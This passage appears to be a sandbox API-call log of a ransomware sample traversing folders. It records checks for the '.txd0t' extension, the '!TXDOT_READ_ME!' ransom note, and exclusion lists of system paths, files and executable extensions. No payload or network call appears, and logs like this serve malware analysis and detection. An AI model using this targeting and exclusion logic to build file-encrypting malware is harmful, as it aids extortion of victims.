ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11c8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.313] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.313] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.313] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0116.313] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0116.313] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t" [0116.313] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.313] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.313] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x143c6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.313] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.313] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.313] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0116.313] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0116.313] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t" [0116.313] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.313] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.313] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.313] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.313] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.313] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0116.313] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0116.313] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" [0116.313] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.313] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.313] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.313] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.314] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.314] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.314] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.314] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.314] FindClose (in: hFindFile=0xec1bf0 | out: hFindFile=0xec1bf0) returned 1 [0116.314] GetProcessHeap () returned 0xe30000 [0116.314] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.314] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a0bd71, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0116.314] StrCmpW (psz1="1046", psz2=".") returned 1 [0116.314] StrCmpW (psz1="1046", psz2="..") returned 1 [0116.314] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.314] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.314] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1046", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system32\\") returned 0x0 [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system\\") returned 0x0 [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\local\\") returned 0x0 [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.314] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\boot\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\perflogs\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\programdata\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\drivers\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\wsus\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="crypt_detect") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="cryptolocker") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="ransomware") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\WINDOWS") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.315] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files") returned 0x0 [0116.315] GetProcessHeap () returned 0xe30000 [0116.315] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.315] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0116.315] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\*") returned="C:\\588bce7c90097ed212\\1046\\*" [0116.315] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a0bd71, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0116.315] StrCmpW (psz1=".", psz2=".") returned 0 [0116.315] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a0bd71, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.315] StrCmpW (psz1="..", psz2=".") returned 1 [0116.315] StrCmpW (psz1="..", psz2="..") returned 0 [0116.315] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x587a97d4, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x587a97d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x587cfa75, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.315] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.315] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.315] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0116.315] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0116.315] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1046\\!TXDOT_READ_ME!.txt" [0116.316] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.316] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.316] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.316] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x587a97d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1063, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.316] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.316] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.316] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0116.316] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0116.316] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t" [0116.316] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.316] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13d62, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.316] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.316] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.316] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0116.316] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0116.316] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t" [0116.316] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.316] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.316] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.316] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.316] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0116.317] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0116.317] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" [0116.317] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.317] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.317] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.317] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.317] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.317] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.317] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0116.317] GetProcessHeap () returned 0xe30000 [0116.317] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.317] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0116.317] StrCmpW (psz1="1049", psz2=".") returned 1 [0116.317] StrCmpW (psz1="1049", psz2="..") returned 1 [0116.317] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.317] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.317] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1049", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0116.317] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system32\\") returned 0x0 [0116.317] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.317] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\local\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\boot\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\perflogs\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\programdata\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\drivers\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\wsus\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="crypt_detect") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="cryptolocker") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="ransomware") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\WINDOWS") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.318] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files") returned 0x0 [0116.318] GetProcessHeap () returned 0xe30000 [0116.318] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.318] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0116.318] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\*") returned="C:\\588bce7c90097ed212\\1049\\*" [0116.318] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, 